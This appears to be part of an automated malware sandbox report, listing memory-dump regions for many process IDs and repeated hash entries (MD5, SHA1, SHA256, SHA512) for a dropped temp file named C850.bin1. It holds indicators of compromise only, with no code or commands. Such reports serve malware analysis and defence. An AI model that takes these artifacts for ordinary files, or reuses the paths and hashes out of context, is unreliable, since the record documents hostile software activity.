memory/3788-165-0x00000226BF1B0000-0x00000226BF253000-memory.dmp

memory/3444-164-0x000001B03F480000-0x000001B03F523000-memory.dmp

memory/4408-167-0x0000021534170000-0x0000021534213000-memory.dmp

memory/5000-169-0x00000000012A0000-0x0000000001336000-memory.dmp

memory/5096-168-0x0000023B05C10000-0x0000023B05CB3000-memory.dmp

memory/1984-170-0x0000000000000000-mapping.dmp

memory/5000-166-0x0000000000996B20-0x0000000000996B24-memory.dmp

memory/384-174-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/5060-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 f7aea2435aa888b709ca20f816c33bfd
SHA1 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256 f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

memory/2648-175-0x0000000008D30000-0x0000000008E6B000-memory.dmp

memory/2648-179-0x000000000A330000-0x000000000A46A000-memory.dmp

memory/656-183-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 b4d5b46f6cbb26eae4510ffefbd50180
SHA1 5b2bace7028f97c76cc98177ee27dd1d3a7d947a
SHA256 03c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b
SHA512 60d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333

memory/612-185-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 b4d5b46f6cbb26eae4510ffefbd50180
SHA1 5b2bace7028f97c76cc98177ee27dd1d3a7d947a
SHA256 03c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b
SHA512 60d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333

memory/4836-187-0x0000000000000000-mapping.dmp

memory/2648-188-0x0000000008670000-0x0000000008713000-memory.dmp

memory/2040-189-0x0000000000000000-mapping.dmp

memory/616-190-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 11304e810189d866fb1d067b4226f720
SHA1 37f1c3a86c37957bd6f1ee4355a7228969de8954
SHA256 051f33538ab034544e8c652ca3967a3590e6749c1119e092b8378e3562dd152f
SHA512 4be53d94bc47367bfda906bae5ae024f07ddbbec6c7668c9aab13d9c149b94fd887f751d23e6d592f67dea48a4a817c5ab53e2f2b857f9af8c29e31f8e2d5e10

memory/4508-192-0x0000000000000000-mapping.dmp

memory/4624-193-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 6555e00a5bd734ac4985eae8005caa4a
SHA1 8db986ba58e89bbef081e8c62cfcbb698faefbab
SHA256 14601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e
SHA512 fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb

memory/2616-195-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 6555e00a5bd734ac4985eae8005caa4a
SHA1 8db986ba58e89bbef081e8c62cfcbb698faefbab
SHA256 14601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e
SHA512 fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb

memory/4444-197-0x0000000000000000-mapping.dmp

memory/4208-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 85ece63f96c67c19c30d853daa1f2f80
SHA1 6dabfd5ea6ae3a2248d837afde06566e7f21d8c7
SHA256 69b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5
SHA512 bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2

memory/4732-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 85ece63f96c67c19c30d853daa1f2f80
SHA1 6dabfd5ea6ae3a2248d837afde06566e7f21d8c7
SHA256 69b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5
SHA512 bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2

memory/4616-202-0x0000000000000000-mapping.dmp

memory/1768-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 064e1c6d618d51982a3fc49034449279
SHA1 02b24698dd2deda95e2b4a6a89dcd4aba575cba6
SHA256 3342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e
SHA512 74cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf

memory/3476-205-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 064e1c6d618d51982a3fc49034449279
SHA1 02b24698dd2deda95e2b4a6a89dcd4aba575cba6
SHA256 3342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e
SHA512 74cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf

memory/4604-207-0x0000000000000000-mapping.dmp

memory/596-208-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 62e78c50aac8d85dc5921a8fa49476e5
SHA1 11ffee8c79e8ea84c5ef347451115379a1b5cf25
SHA256 a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5
SHA512 3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

memory/1976-210-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 62e78c50aac8d85dc5921a8fa49476e5
SHA1 11ffee8c79e8ea84c5ef347451115379a1b5cf25
SHA256 a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5
SHA512 3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

memory/3012-212-0x0000000000000000-mapping.dmp

memory/2696-213-0x0000000000000000-mapping.dmp

memory/4904-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 1e1ee75c750bc92d38124ac10b634351
SHA1 49c0d724825a589a830b3e24e7b6e63197dbc267
SHA256 01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97
SHA512 256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

memory/428-216-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 1e1ee75c750bc92d38124ac10b634351
SHA1 49c0d724825a589a830b3e24e7b6e63197dbc267
SHA256 01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97
SHA512 256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

memory/332-218-0x0000000000000000-mapping.dmp

memory/2036-219-0x0000000000000000-mapping.dmp

memory/2456-220-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 a02aaa0b88c1c0e78d57de5c5030a0f5
SHA1 f705b3e4411ce3fd568df68ec50444b124dded80
SHA256 80829bd83b8024dbb40c5ae27926ad7e77dcb3c1ed1cda8b2bc2822daa6f3780
SHA512 3be19135519a0bfb22c87cb890b9e82403746da773be6aac55d3e15bfcfbc3f5e9959ddbef408e88cb146f9b1844a0bf7f614c3563cc01dc9908e00f13513c8a

memory/2032-222-0x0000000000000000-mapping.dmp

memory/1360-223-0x0000000000000000-mapping.dmp

memory/1936-224-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 4dfe7605d104363749b031810b0ed58a
SHA1 879ade695f3cee771e5ec57c648946b5064a86a8
SHA256 7b5d9bfeda2472edc4aba4a1ee23857a62b12cd50bac1ebf0a6b69b167056bfa
SHA512 b14ebad24201fe546cf1703ce65bce0d206c74d9cbf2e9b8637b84a8b1c58ea2070328f8d1dd96fc19820a738bcb519d11cd83dcc4429363e6913942f1db8982

memory/4216-226-0x0000000000000000-mapping.dmp

memory/4156-227-0x0000000000000000-mapping.dmp

memory/1528-228-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 ae8cd7c77619badaa90ce1fc70c97a82
SHA1 5d1de7e2a02422a967a87183e18ad21a47877d36
SHA256 126e9149cb9692c0116044bc8efba7db39f455b181e03809ba708b92e31040be
SHA512 3d603aa42838de2bc90b9f77510615a5c31e4f0965efb198b792a131f12fc05fba109442802e3b448c48ef39fd5278fe99906a4993ebc8fd98f5bb43357ff554

memory/3248-230-0x0000000000000000-mapping.dmp

memory/2308-231-0x0000000000000000-mapping.dmp

memory/3640-232-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\C850.bin1

MD5 cd59f10228885715c333d108db13007f
SHA1 431666dc5693935be2cf9b18fa689568f34e20b8
SHA256 8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a
SHA512 02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43

C:\Users\Admin\AppData\Local\Temp\C850.bin

MD5 cd59f10228885715c333d108db13007f
SHA1 431666dc5693935be2cf9b18fa689568f34e20b8
SHA256 8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a
SHA512 02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43